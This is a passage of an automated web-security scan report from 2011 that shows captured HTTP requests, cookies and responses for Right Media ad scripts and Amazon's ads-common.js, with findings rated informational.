Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; lifb=*Tk,Jb.[D5dVZ8Ls8s'au>5f*!LvQp_Z5lxm/ZqKvPS6f; ih="b!!!!R!)H$Y!!!!#=!$ZT!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+V>!!!!-=!$Yk!,+Z*!!!!)=!2:h!/'y^!!!!#=!2:'!/Bh/!!!!)=!$iQ!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/as*!!!!#=!$hi!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!/o*l!!!!#=!$g0!0)='!!!!$=!$bL!024(!!!!#<ypn>!0242!!!!#<ypnV!0Q[1!!!!#=!$`1!0eUu!!!!#<y]8.!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!0w#U!!!!#=!$[A!0w#[!!!!#=!$]p!1CPe!!!!#=!=eG!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1`XP!!!!#=!$iV!1`Xi!!!!#=!$fG!1kC+!!!!%<xqSY!1kC5!!!!$<yqWP!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM!1mN8!!!!#=!$d%!2)PY!!!!#=!$c9!2/j@!!!!#=!2:6!28V/!!!!$=!2:N"; vuday1=!!!!#N==#3P+HYn; pv1="b!!!!<!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!#M*E!!!(#!$u#*!0242!%=e2!!!%%!?5%!%5F4/!wVd.!'iA7!'D#r!'AvZ~~~~~<ypnV=!oTp~!!J<[!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=!K3cM.jTN!!L7_!,p['!#=4U!,+Z*!$%hK!#:m/~%5XA4!w1K*!$NK_!$OyC!$hK:~~~~~=!2:h=#0y*M.jTN!#q(2!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj[!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!>Uk!!!#G!#wj]!,x.^!$Rao!0w#[!%R[j!(-EV!?5%!$q31/!wVd.!%vQM!%C9A!']NU~~~~~=!$]p=!JR=!!!#G!!:Om!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:PM!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:R7!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!:TL!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMh!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMj!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMm!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMo!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!tMq!,x.^!$Rao!0Q[1!%ICt!(Ra[!?5%!$q31/!wVd.!%vQM!#d5Z!'Q$x~~~~~=!$`1=##FK~!!LdL!,x.^!$Rao!0)='!%bu4!)F7a!!?5%$q310!wVd.!%vQM!%C9A!'pH$~~~~~=!$bL=!JVp!!!#G!$*[q!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[s!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[u!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!$*[w!,x.^!$Rao!2)PY!%iKw!)kPg!?5%!$q31/!wVd.!%vQM!#rxb!'y>c~~~~~=!$c9='8MD~!#u*W!!!/p!$YQ#!1`XP!%cM5!#:m1!?5%!$q31/!wVd.!'0v@!%Mqq!'q-*~~~~~=!$iV~~!#g<5!!!/p!$YQ#!/as*!%<)(!!mT-!?5%!$q31/!wVd.!'0v@!%Mqq!'?wJ~~~~~=!$hi~~!#vtn~!$m%+!1CPe!%]D<!!!!$!?5%!$U*40!ZZ<)!!jYm!'iBj~~~~~~=!=eG~M.jTN"; bh="b!!!%,!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!-=!=eG!!0O<!!!!7=!=eG!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!3=!=eG!!J<E!!!!3=!=eG!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!4=!=eG!!q:E!!!!1=!=eG!!q<+!!!!2=!=eG!!q</!!!!2=!=eG!!q<3!!!!2=!=eG!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)!!!!#=!=eG!!tjQ!!!!,<yq][!!ucq!!!!7=!=eG!!vRm!!!!-=!=eG!!vRq!!!!-=!=eG!!vRr!!!!-=!=eG!!vRw!!!!7=!=eG!!vRx!!!!-=!=eG!!vRy!!!!-=!=eG!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!-=!=eG!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xa!!!!#=!=SS!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!-=!=eH!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!-=!=eG!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!-=!=eG!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!-=!=eG!#MTF!!!!-=!=eG!#MTH!!!!-=!=eG!#MTI!!!!-=!=eG!#MTJ!!!!-=!=eG!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!3=!=eG!#SF3!!!!3=!=eG!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!-=!=eG!#UDP!!!!3=!=eG!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!-=!=eG!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!-=!=eG!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!-=!=eG!#tM)!!!!-=!=eG!#tn2!!!!-=!=eG!#uE=!!!!#<x9#K!#uJY!!!!3=!=eG!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!-=!=eG!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!0=!=eG!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!-=!=eG!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!-=!=eG!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!0=!=eG!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:32:39 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 13:32:39 GMT
Pragma: no-cache
Content-Length: 4319
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...
23.2. http://www.assoc-amazon.com/s/ads-common.js  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.assoc-amazon.com
Path:   /s/ads-common.js

Request

GET /s/ads-common.js HTTP/1.1
Host: www.assoc-amazon.com
Proxy-Connection: keep-alive
Referer: http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response


// Color library

// RGB object
function AmazonRGB(red, green, blue)
{
// These are integers between 0 and 255 inclusive.
this.r = red;
this.g = green;
this.b = blue;
}

// Accessor methods for the RGB
...[SNIP]...
Report generated by XSS.CX at Thu May 12 08:37:03 CDT 2011.